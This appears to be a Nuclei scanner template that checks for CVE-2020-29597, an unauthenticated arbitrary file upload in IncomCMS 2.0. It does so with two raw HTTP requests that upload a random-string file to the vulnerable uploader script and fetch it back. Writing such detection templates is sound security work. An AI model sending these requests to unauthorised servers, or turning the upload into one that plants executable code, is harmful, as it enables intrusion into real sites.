id: CVE-2020-29597

info:
  name: IncomCMS 2.0 - Arbitrary File Upload
  author: princechaddha
  severity: critical
  description: |
    IncomCMS 2.0 has an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.
  reference:
    - https://github.com/Trhackno/CVE-2020-29597
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29597
    - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
    - https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29597
    cwe-id: CWE-434
    epss-score: 0.83522
    cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: incomcms_project
    product: incomcms
  tags: cve,cve2020,incomcms,fileupload,intrusive

http:
  - raw:
      - |
        POST /incom/modules/uploader/showcase/script.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt

        ------WebKitFormBoundaryBEJZt0IK73M2mAbt
        Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.png"
        Content-Type: text/html

        {{randstr_2}}
        ------WebKitFormBoundaryBEJZt0IK73M2mAbt--
      - |
        GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '{"status":"1","name":"{{randstr_1}}.png"}'

      - type: word
        part: body_2
        words:
          - '{{randstr_2}}'